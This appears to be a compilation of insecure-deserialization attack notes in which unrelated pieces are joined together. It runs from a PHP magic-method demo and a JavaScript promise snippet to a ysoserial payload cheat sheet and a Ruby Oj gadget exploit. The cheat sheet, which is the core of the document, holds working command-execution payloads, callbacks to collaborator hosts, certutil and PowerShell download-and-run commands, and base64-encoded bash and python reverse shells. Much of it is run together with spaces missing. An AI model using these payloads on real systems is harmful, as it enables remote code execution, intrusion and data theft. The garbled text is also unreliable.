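<?php

/**
 * Minimal demonstration of which PHP magic methods fire around
 * serialize()/unserialize(): __construct, __sleep, __wakeup, __destruct
 * and __toString. Each hook announces itself with echo so the call order
 * is visible when the script is run (see the transcript at the bottom).
 */
class test
{
    public $s = "This is a test";

    /** Prints the public attribute followed by an HTML line break. */
    public function displaystring()
    {
        echo $this->s . '<br />';
    }

    /**
     * Called when the object is used in a string context.
     * PHP requires __toString() to return a string; the original echoed the
     * message and returned nothing, which raises an Error on PHP 8.
     */
    public function __toString()
    {
        return '__toString method called';
    }

    public function __construct()
    {
        echo "__construct method called";
    }

    public function __destruct()
    {
        echo "__destruct method called";
    }

    /** Runs on unserialize(); the classic entry point for gadget chains. */
    public function __wakeup()
    {
        echo "__wakeup method called";
    }

    /**
     * Runs on serialize(). The returned names select which properties are
     * written out; "s" refers to the public attribute above.
     */
    public function __sleep()
    {
        echo "__sleep method called";
        return ['s'];
    }
}

$o = new test();
$o->displaystring();
$ser = serialize($o);
echo $ser;
// unserialize() instantiates whatever class the string names and runs its
// __wakeup/__destruct hooks; allowed_classes pins the result to this demo class
// so a modified string cannot pull in any other class loaded in the process.
$unser = unserialize($ser, ['allowed_classes' => ['test']]);
$unser->displaystring();

/*
php > $o = new test();
__construct method called
__destruct method called
php > $o->displaystring();
This is a test<br />
php > $ser=serialize($o);
__sleep method called
php > echo $ser;
O:4:"test":1:{s:1:"s";s:14:"This is a test";}
php > $unser=unserialize($ser);
__wakeup method called
__destruct method called
php > $unser->displaystring();
This is a test<br />
*/
?>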
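// If you can compromise p (the returned object) to be a promise, it will be
// executed just because it's the return object of an async function.
// Defender's view: an async function that returns a value built from untrusted
// data (e.g. a deserialized object) hands that object's own `then` to the
// promise machinery, so a deserialization sink can turn into a code sink.
async function test_resolve() {
    const p = new Promise((resolve) => {
        console.log('hello');
        resolve();
    });
    return p;
}

// The executor's single parameter is just the resolve callback under a
// misleading name; it is never called and the return value of an executor is
// ignored, so this promise never settles. Kept as in the original to show that
// only the returned object's `then` matters, not what the executor does.
async function test_then() {
    const p = new Promise((then) => {
        console.log('hello');
        return 1;
    });
    return p;
}

// The original called test_ressolve(), an undefined name -> ReferenceError.
test_resolve();
test_then();
// For more info: https://blog.huli.tw/2022/07/11/en/googlectf-2022-horkos-writeup/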
# PoC to make the application perform a DNS reqjava-jarysoserial-master-SNAPSHOT.jarURLDNShttp://b7j40108s43ysmdpplgd3b7rdij87x.burpcollaborator.net>payload# PoC RCE in Windows# Pingjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections5'cmd /c ping -n 5 127.0.0.1'>payload# Time, I noticed the response too longer when this was usedjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c timeout 5">payload# Create Filejava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c echo pwned> C:\\\\Users\\\\username\\\\pwn">payload# DNS requestjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c nslookup jvikwa34jwgftvoxdz16jhpufllb90.burpcollaborator.net"# HTTP request (+DNS)java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"cmd /c certutil -urlcache -split -f http://j4ops7g6mi9w30verckjrk26txzqnf.burpcollaborator.net/a a"java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections4 "powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAYwBlADcAMABwAG8AbwB1ADAAaABlAGIAaQAzAHcAegB1AHMAMQB6ADIAYQBvADEAZgA3ADkAdgB5AC4AYgB1AHIAcABjAG8AbABsAGEAYgBvAHIAYQB0AG8AcgAuAG4AZQB0AC8AYQAnACkA"
## In the ast http request was encoded: IEX(New-Object Net.WebClient).downloadString('http://1ce70poou0hebi3wzus1z2ao1f79vy.burpcollaborator.net/a')## To encode something in Base64 for Windows PS from linux you can use: echo -n "<PAYLOAD>" | iconv --to-code UTF-16LE | base64 -w0# Reverse Shell## Encoded: IEX(New-Object Net.WebClient).downloadString('http://192.168.1.4:8989/powercat.ps1')java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"powershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgAxAC4ANAA6ADgAOQA4ADkALwBwAG8AdwBlAHIAYwBhAHQALgBwAHMAMQAnACkA"#PoC RCE in Linux# Pingjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"ping -c 5 192.168.1.4">payload# Time## Using time in bash I didn't notice any difference in the timing of the response# Create filejava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"touch /tmp/pwn">payload# DNS requestjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"dig ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"nslookup ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"# HTTP request (+DNS)java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"curl ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net">payloadjava-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"wget ftcwoztjxibkocen6mkck0ehs8yymn.burpcollaborator.net"# Reverse shell## Encoded: bash -i >& /dev/tcp/127.0.0.1/4444 0>&1java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvNDQ0NCAwPiYx}|{base64,-d}|{bash,-i}"|base64-w0## Encoded: export RHOST="127.0.0.1";export RPORT=12345;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in 
(0,1,2)];pty.spawn("/bin/sh")'java-jarysoserial-master-SNAPSHOT.jarCommonsCollections4"bash -c {echo,ZXhwb3J0IFJIT1NUPSIxMjcuMC4wLjEiO2V4cG9ydCBSUE9SVD0xMjM0NTtweXRob24gLWMgJ2ltcG9ydCBzeXMsc29ja2V0LG9zLHB0eTtzPXNvY2tldC5zb2NrZXQoKTtzLmNvbm5lY3QoKG9zLmdldGVudigiUkhPU1QiKSxpbnQob3MuZ2V0ZW52KCJSUE9SVCIpKSkpO1tvcy5kdXAyKHMuZmlsZW5vKCksZmQpIGZvciBmZCBpbiAoMCwxLDIpXTtwdHkuc3Bhd24oIi9iaW4vc2giKSc=}|{base64,-d}|{bash,-i}"# Base64 encode payload in base64base64-w0payload
#Send pingysoserial.exe-gObjectDataProvider-fJson.Net-c"ping -n 5 10.10.14.44"-obase64#Timing#I tried using ping and timeout but there wasn't any difference in the response timing from the web server#DNS/HTTP requestysoserial.exe-gObjectDataProvider-fJson.Net-c"nslookup sb7jkgm6onw1ymw0867mzm2r0i68ux.burpcollaborator.net"-obase64ysoserial.exe-gObjectDataProvider-fJson.Net-c"certutil -urlcache -split -f http://rfaqfsze4tl7hhkt5jtp53a1fsli97.burpcollaborator.net/a a"-obase64#Reverse shell#Create shell command in linuxecho-n"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.44/shell.ps1')"|iconv-tUTF-16LE|base64-w0#Create exploit using the created B64 shellcodeysoserial.exe-gObjectDataProvider-fJson.Net-c"powershell -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANAAuADQANAAvAHMAaABlAGwAbAAuAHAAcwAxACcAKQA="-obase64
# Sink pattern under review: a method name taken from user input reaches
# send, so every method on the receiver that can be called with no
# arguments becomes reachable. The enumeration below measures that surface.
<Object>.send('<user_input>')
# This code is taken from the original blog post
# <Object> in this case is Repository
## Find methods with those requirements
repo = Repository.find(1) # get first repo
repo_methods = [ # get names of all methods accessible by Repository object
  repo.public_methods(),
  repo.private_methods(),
  repo.protected_methods(),
].flatten()
repo_methods.length() # Initial number of methods => 5542
## Filter by the arguments requirements
# send(name) passes no arguments, so only methods with arity 0 (no parameters)
# or -1 (no required parameters) are callable; anything else raises ArgumentError.
candidate_methods = repo_methods.select() do |method_name|
  [0,-1].include?(repo.method(method_name).arity())
end
candidate_methods.length() # Final number of methods=> 3595
# Existing Ruby class inside the code of the app
class SimpleClass
  def initialize(cmd)
    @cmd = cmd
  end

  # #hash is an ordinary Ruby hook (invoked e.g. when the object is used as a
  # Hash key); because it runs the stored command, any path that lets an
  # attacker set @cmd and then trigger #hash turns this class into a gadget.
  def hash
    system(@cmd)
  end
end

# Exploit
require 'oj'
simple = SimpleClass.new("open -a calculator") # command for macOS
json_payload = Oj.dump(simple)
puts json_payload
# Sink vulnerable inside the code accepting user input as json_payload
# Oj.load in its default (object) mode instantiates the class named in the JSON
# and sets its ivars from the document. For untrusted input use Oj.safe_load or
# pass mode: :strict so only Hash/Array/scalars are produced.
Oj.load(json_payload)